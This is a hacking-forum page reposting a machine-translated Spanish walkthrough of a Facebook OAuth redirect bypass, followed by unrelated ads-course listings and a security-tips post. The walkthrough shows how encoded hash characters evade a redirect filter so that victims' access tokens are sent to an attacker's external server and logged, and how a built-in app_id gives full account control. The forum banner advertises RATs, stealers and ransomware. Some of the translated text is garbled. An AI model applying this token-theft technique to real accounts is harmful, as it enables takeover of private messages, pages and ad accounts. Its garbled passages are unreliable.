Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

 

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Sign in to follow this  
      dEEpEst

      Cómo pirateé Facebook OAuth para obtener un permiso completo en cualquier cuenta de Facebook

      Recommended Posts

      Staff

      Cómo pirateé Facebook OAuth para obtener un permiso completo en cualquier cuenta de Facebook

      Para que este exploit funcione, la víctima solo necesita visitar una página web, 
      así que OAuth es utilizado por Facebook para comunicarse entre usuarios de aplicaciones y Facebook. Usualmente los usuarios deben permitir / aceptar la solicitud para acceder a su cuenta antes de que la comunicación pueda comenzar. 

      Cualquier aplicación de Facebook puede solicitar diferentes permisos. 

      Por ejemplo: 

      Diamond Dash, Texas Holdem Poker solo tiene permiso para obtener información básica y publicar en el muro del usuario 

      . Encontré una forma de obtener permisos completos (leer en la bandeja de entrada, en la bandeja de salida, administrar páginas, administrar anuncios, leer fotos privadas, videos, etc.) sobre la cuenta de la víctima incluso sin ninguna aplicación instalada en la cuenta de la víctima,
      Otra ventaja de la falla que encontré es que no existe una "fecha de caducidad" del Token como lo habría en cualquier otro uso de la aplicación. En mi ataque el token nunca caduca a menos que la víctima cambie su contraseña . 

      Entonces, la URL del OAuth el diálogo se ve así: 

      https: //www.facebook...ERMISSION_NAMES


      Cada aplicación en Facebook tiene diferentes id_aplicaciones, por ejemplo, 'Diamante Dash' será app_id = 2, y 'Texas Holdem Poker' será app_id = 3 

      El siguiente, El parámetro redirect_uri (next =, redirect_uri =) solo acepta el dominio de la aplicación propietaria. 
      Por ejemplo, app_id = 2389801228 pertenece a la aplicación 'Texas Holdem Poker', por lo que el 'siguiente' parámetro permitirá solo el dominio zynga.com (es decir, next = http: //zynga.com),
      Si el dominio es diferente (nirgoldshlager.com) en el parámetro 'siguiente', 'redirect_uri', Facebook bloqueará esta acción, 

      Facebook realizará una coincidencia entre su app_id y su próximo parámetro, Facebook también envía el token de acceso a través de la solicitud GET al propietario aplicación después de que el usuario lo permitió, 
      ahora que sabemos cómo funciona Facebook OAuth, vamos a hablar sobre mis hallazgos, 
      comencé a pensar en mis opciones, ¿qué pasa si puedo redirigir la solicitud OAuth de la aplicación a una URL 'SIGUIENTE' diferente? Primero intenté cambiar el parámetro 'siguiente' por un dominio diferente y ellos bloquearon mi acción. 
      Luego intenté cambiar el siguiente parámetro al dominio facebook.com, y me bloquearon nuevamente con un mensaje de error general,


      Descubrí que si usa un subdominio, por ejemplo: xxx.facebook.com, Facebook permitirá esta acción, 
      pero si intenta acceder a carpetas / archivos en x.facebook.com (x.facebook.com/xx/x .php), Facebook te bloquea, 
      entonces noto que facebook.com usa un signo Hash y! allí URL (x.facebook.com/#!/xxxx), 
      traté de realizar esta acción en el siguiente parámetro (next = x.facebook.com /% 23! /), ¡y Facebook me bloqueó nuevamente !, 
      entonces intentado poner "algo" entre el signo de hash y el! (% 23x!), Y Facebook no bloqueó esta acción, 
      Parece que hay una protección Reg-ex, ¡Genial !, ¡ 

      Pero espera !, 

      si ponemos algo como esto ( https://beta.facebook.com/# xxx! / messages /), la acción no se tratará en ¡es lo mismo que #! en nuestro cliente, y no nos redirigirá a la pantalla del mensaje, 
      pensé que tenía que encontrar una manera de evitarlo, ¡así que comencé a confundir personajes entre ellos! y # para que pueda hacer que cualquier navegador (IE, CHROME, Safari, Firefox ...) lo trate como # !, ¡ 

      Ahora es el momento de difuminar !, 

      Resultado: ¡ 

      % 23 ~! (Funciona en todos los navegadores) 
      % 23% 09! (Funciona en todos los navegadores) 

      ¡Genial! Este truco funciona en touch.facebook.com/#%09!/,m.facebook.com/#~!/, o en cualquier otro móvil de Facebook, toque el dominio), 

      así que ahora yo ' puedo redirigir a la víctima a cualquier archivo / directorio en cualquier subdominio de Facebook,
      Luego creé una aplicación de Facebook que redireccionará a la víctima al sitio web externo para enviar el access_token de la víctima a mi sitio web externo "malicioso". 

      Por ejemplo: (Zynga Texas Holdem OAuth Bypass):


      https: //www.facebook...onse_type=token '> https: //www.facebook...onse_type=token 


      El siguiente parámetro se redirigirá a mi aplicación de Facebook (touch.facebook.com/apps/testestestte), 
      y mi aplicación de Facebook redireccionará a files.nirgoldshlager.com domain y guardará a la víctima access_token en un archivo de registro (files.nirgoldshlager.com/log.txt), 

      Amazing !, ahora puedo robar tokens de acceso de cualquier aplicación de Facebook, 

      ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡Espera !! 


      AQUÍ VIENE LA REAL ACCIÓN: 

      para hacer un ataque exitoso, la víctima necesita usar una aplicación de Facebook (Texas Holdem Poker, Diamond
      Y estas aplicaciones solo tienen permisos básicos. Siempre podemos cambiar el alcance del permiso de la aplicación y establecer un nuevo permiso, pero este método no es poderoso, ya que la víctima debe aceptar los nuevos permisos de la aplicación (https: //www.facebook...s read_requests), 


      ¡quería algo más poderoso !, 

      algo que me daría todos los permisos (leer en la bandeja de entrada, en la bandeja de salida, administrar páginas, administrar anuncios, acceder a fotos privadas, videos, etc.) en la cuenta de la víctima sin ninguna aplicación instalada en la víctima y hacer que Facebook haga el Goldshake , 

      entonces comencé a pensar 
      ¿Cómo se puede hacer esto ?, 
      ¿Qué pasa si voy a usar un app_id diferente? app_id de Facebook Messenger por ejemplo, 
      ¿necesita el usuario aceptar la aplicación Facebook Messenger en su cuenta de Facebook ?, 

      la respuesta es no, 
      hay aplicaciones integradas en Facebook que los usuarios nunca deben aceptar, y esta aplicación tiene un control total sobre su cuenta,
      También encontré que este access_token nunca expiró en Facebook Messenger, 


      solo después de que la víctima cambiara su contraseña, entonces el access_token caducará, pero ¿por qué demonios el usuario cambiaría su contraseña ?, 

      PoC (funciona en todos los navegadores, no necesita instalarse) aplicación en la cuenta de la víctima): 


      https: //www.facebook...onse_type=token


      Seguridad de Facebook Corregido este error 

      Descripción completa del permiso para la aplicación de mensajería de Facebook:

      ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login 

      Funciona también en cuentas de verificación de 2 pasos, cuando se trata de access_token, la verificación de 2 pasos fallará. 

      ¿¿¿Y??? 

      Video Tutorial

       

      Share this post


      Link to post
      Share on other sites
      Guest
      This topic is now closed to further replies.
      Sign in to follow this  

      • Similar Content

        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Description
          Are you looking for a Facebook Ads course that shows you EXACTLY how to set up and run profitable Facebook Ads campaigns?
          Great, you’re in the right place.
          I don’t just talk the talk; I actually walk the walk and live it too. In this course, you’ll be able to watch me in real-time as I show you exactly how I set up and run profitable Facebook ads, step by step.
          Instead of just giving you the theory and then leaving it up to you to figure it all out, you’ll be able to watch over my shoulder and see how to implement everything I’m teaching, ensuring everything you learn is super actionable.
          The process I follow throughout the course is the SAME process I use when setting up and creating ads for my clients, so you can be confident what you’re learning is indeed used in the real world and does actually work.
          The course is split into 2 core parts:
              Facebook Marketing
              Facebook Ads
          What you’ll learn by taking this course:
          1. Facebook Marketing
              Learn how to set up a facebook business page from scratch
              Learn how to optimise your facebook business page for maximum visibility
              Learn how to acquire likes on your business page
              Learn how to generate more engagement on your business page posts
          2. Facebook Ads
              Learn how To set up a Facebook ad account
              Understand what key facebook ad policies you need to be aware of
              Learn how to create your first facebook ad campaign from scratch
              Learn how to define your target audience (audience targeting)
              Learn all about detailed targeting
              Learn how to set up a simple A/B split test
              Learn how to set up Facebook conversion tracking (facebook pixel)
              Learn how to set up custom audiences
              Learn everything you need to know about the Facebook business manager
              Learn how to set up video ad campaigns
              Learn how to set up lead campaigns
          Literally EVERYTHING you need to be able to create and implement a successful Facebook Ads campaign.
          There are tons of resources for you to download throughout the course and lots of bonus tips and tricks you can use as well.
          Fact: Facebook has 2.74 billion monthly active users!
          Learn how to set up Facebook ads today and get your business infront off that massive audience.
          So, what are you waiting for?
          Enrol now.
          Who this course is for:
              Small business owners
              Bloggers, Influencers, Public Figures
              Online marketers and marketing managers
              Anyone who is looking to master Facebook Ads
              Anyone who is looking to master Facebook Marketing
              Entrepreneurs
          Requirements
              No, all that I ask is that students come with an open mind ready to learn.
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By dEEpEst
          Facebook’s security practices changed for the better after its biggest data breach. If you haven’t heard already, hackers managed to steal 267 million user profiles. And, they did exactly what any other hacker would do - they sold the data on the Dark Web for other malicious actors to exploit.
          To make the matters worse, this happened only a couple of days after the massive Zoom data breach which affected over half a million users.
          This just shows how vulnerable your online accounts can be, including Facebook. Even though Facebook has implemented a better cybersecurity infrastructure, that doesn’t mean that your account is 100% safe.
          Today, even newbie hackers can infiltrate your account. And if they have the means or the know-how, you can easily hack a Facebook account and expose someone's private messages.
          But luckily, you can also prevent this from happening quite easily. In this article, we’ll go over some important tips that every digital user should implement.
          Data has become more vulnerable than ever, with hundreds of hacking attempts happening every day. So, stay safe by following these tips below.
          1. Use a Password Manager to Store and Create Passwords
          Wondering how to prevent a Facebook hack easily? Just use a secure password. Simply put, password managers help you store and create unique passwords.
          This means that you can choose to create very long and complex passwords that are not easy to hack. In addition, they also take away the burden of recalling passwords for all sites.
          image  
          However, password managers can also help with:
          Generating new passwords for your accounts periodically Storing credit card information Multi-factor authorization Ideally, long and complex passwords make it harder for hackers to brute force themselves into your Facebook account. And password managers can help you with that.
          Luckily for you, if you’re a Chrome user, Google has implemented an automatic password generator that pops up every time you need to create a password. It will automatically generate a strong password and store it in the password manager. That way, you’ll always have a bulletproof password only one click away.
          2. Hide Your Email Address from Your Friend List
          For most people, an email address is a gateway to several other accounts apart from Facebook. This is especially true if you use the same password for all your accounts.
          As such, it’s essential to hide your email address from public view as much as you can. And yes, that includes your Facebook friend list too.
          To get started on hiding your email address on Facebook, this is what to do:
          While logged in to your Facebook account, click on your name/profile picture to access your profile. On the profile page, click the About tab. Select Contact and Basic Information from the left menu to see a list of your contact information. Click on the edit icon next to your email then set the Facebook Privacy Settings as Only me. image Doing that ensures that only you can see your email address. Since hackers can’t also see your email address, you’ll be much less of a target to them. People can do a lot of things only with your email, so make sure to keep it private. 3. Log Out of Old Devices
          Unlike your banking app, Facebook always keeps you logged in once you log in. And this means that anyone who uses one of your old devices can gain access to your account.
          Since they won’t be needing any password, it’ll be easy to collect all the information they need. But luckily, you can instruct Facebook to log you out of all active devices.
          Below is what you should do to log out of old devices:
          If logged in, tap on the arrow on the top right part of your screen next to the notification bell then click Settings and Privacy. On the settings page, click Security and Login. Under the section Where You’re Logged In, you’ll see a list of all devices that have recently accessed your account. Click on the three dots beside any of your old devices and select Logout.   By logging out, anyone using your old device will need to login once more to access your account. You can therefore rest easy knowing that no one can access your Facebook account.
          4. Enable a VPN When Using Public Wi-Fi
          To many, VPNs are tools to use to unblock restricted web content. In schools, for instance, it is common for students to use VPNs to unblock sites like Facebook.
          image However, VPNs also add a layer of protection. And particularly when you’re using public Wi-Fi. So, is Facebook secure over public Wi-Fi? Not really, think again.
          VPNs work by creating an encrypted tunnel between your device and Facebook. Therefore, anyone who tries intercepting your messages won’t be able to do so. By using a VPN, not only will you keep your identity hidden, but you’ll also protect yourself from various hacking attacks such as man-in-the-middle attacks or spoofing.
          5. Learn How to Recognize Phishing Links
          Most Facebook accounts today get hacked through phishing. But sadly, few people know what phishing is and how it works in the first place. The whole purpose of a phishing email is to create a fake account that will mimic a well-known company or a person.
          image Then, the hackers con the users into clicking various links that either contain malware, or will take them to a fake page where they’ll enter their login credentials. Then, the hackers will use this data for identity theft, blackmail, and a lot of other bad stuff.
          Regardless, it’s still easy to spot a phishing email as well as its links. This is how:
          The e-mail sender doesn’t refer you by name Hover over links to see the true URL E-mail message content has spelling errors and typos The messages request sensitive information Conclusion
          In all honesty, staying vigilant is the best way of preventing your Facebook account from getting hacked. And that means you’ll need to instantly take action whenever you notice strange activity on your account. We hope that, through this article, you’ve learned how to secure a Facebook account from hackers.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Are you looking for a solution that helps you showcase feeds from social networks right on your website? WP Social Stream Designer plugin is Perfect for this. Plugin is used to get social media content from various platforms like Twitter, Instagram, Facebook, RSS and many more to give you beautiful responsive wall on your WordPress website. You can combine all of your social network feeds into a single network stream or display one social network feeds with different designs and layouts.
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Facebook is full of customers waiting for you! Make them interested in what you do, buy what you sell with Facebook Ads!.
          What you’ll learn
              Implement the Facebook Pixel and advanced tracking strategies
              MASTER Facebook Marketing all in one course!
              Make money using Facebook Ads
              Grow customer reach through Facebook Marketing
              Create magnetic Facebook Lead Generation Ads & boost your Facebook Marketing sign ups
              Learn how to SELL using Facebook Ads
              Learn how to utilise the POWER of Facebook Pixel Events
              Set up Facebook Business Pages & benefit from all Facebook Marketing Page features
          Requirements
              No experience of Facebook Advertising required.
              Basic understanding of Facebook
          Description
          The most complete and free course on Facebook Marketing from beginner level to advanced: How to succeed in your marketing and communication on Facebook.
          This course has been built to give you the means and methodology to quickly build your marketing strategy to increase your sales, attract new customers and master Facebook. You will be able to create a Facebook ad, to grow your Facebook page likes and post engagement, to find new customers that will drive your brand to new heights via online marketing.
          Without blah-blah nor technical or advertising terms, how to apprehend, understand, define your strategy and set up simple actions to get results.
          What you will learn in this free course :
              How to create a Facebook Business account
              How to Create a Facebook ads account
              How to add payment method on your Facebook Business account
              How to edit your Business Settings
              How to add you Facebook Business Page or how to create a new one
              How to setup your ads manager column for Lead Generation
              How to setup your ads manager column for E-Commerce
              How to create your Facebook Pixel
              How to add your Facebook Pixel on WordPress
              How to add your Lead event code on page
              How to instal the Facebook Pixel Helper
              How to write your ad creatives for maximum conversion
              How to create your campaign conversions for Lead Generation
              Understand the Campaign and Ad objectives
              How to use the built-in video maker in Ads Manager
              How to do a proper split test campaign
          Who this course is for:
              People who want to learn how to setup a Facebook Ads campaign
              People who want to get more sells
              People who want to get more leads
              People who want to use Facebook Business
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.
        • By itsMe

          Hidden Content
          Give reaction to this post to see the hidden content. Easy Facebook Ads – Marketing and Advertising with Jun Wu
          Welcome to the easy Facebook ads academy, let me show you how to run ads the easy way!
          I basically condensed years of not only my own Facebook Ads experience but also the experience I had working with my clients and students down to this short and intensive course.
          Let me show you what I mean.
          If you have never run ads before… don’t worry, start at Week 1. This week.
          I will explain the psychology of the users on Facebook and how Facebook Ads are different than YouTube Ads.
          This will immediately get you up to speed on what will work and what won’t work when running ads on the platform.
          We will literally spend minutes, not hours setting up your Facebook page and your ads manager ready to run ads.
          If you are intimidated by the complicated looking dashboard of the ads manager, don’t be. I will do a fun Facebook Ads manager and explain the bare essentials, the only things that you need to know, to run ads.
          Because this is the Easy Facebook Ads academy, we are going to run ads the easy way. I will explain how to structure your campaigns in a way that will prevent any complications from ever happening. That’s how easy it will be.
          If you are not sure what kinds of ads to create and how to create it, then start at week 2.
          I call it the creative week. We’ll be creating your lead magnet, landing page, thank you page, and the ad all in a few days.
          But first, we will talk about how to avoid getting our ads rejected by the Facebook ad cop. The Facebook algorithm. It’s like a robot that is programed to seek out and reject ads based on certain parameters. Once you know what its looking for you will be able to fly under its radar.
          Then we’ll complete your 4 step customer pathway. So that your ad will get clicks, and those clicks will turn into leads and those leads will eventually turn into sales.
          If you already have your ads created and need a refresher on how to setup your campaigns the correct way then start at week 3.
          I will hold your hand and show you how to setup up everything step by step. How to install the Facebook Pixel, how to structure your campaign the easy way, and then show you with over the shoulder walk through tutorials how to setup your campaign, ad set, and ad. So all you need to do is to follow along.
          You will also learn the targeting options secret that my clients and I use to instantly find your ideal customers. We call it the 3 flavor ice cream targeting strategy and it will help you find people who are actually sincere about your niche and are the most likely to interact and buy
          And finally, if your ad is already running and you are having a trouble figuring out if it’s a winner or loser, than start at week 4.
          I will make data analysis simple, help you arrange your columns of data, show you what data points to look for and solutions to fix ads that are not performing as well as you would like.
          Then we will finish up with some advanced copy writing secrets, advanced targeting secrets, and even an email marketing mini-course so that you not only increase the quality of leads coming into your business but also start converting them into paying customers.
          Hidden Content
          Give reaction to this post to see the hidden content.

          Hidden Content
          Give reaction to this post to see the hidden content.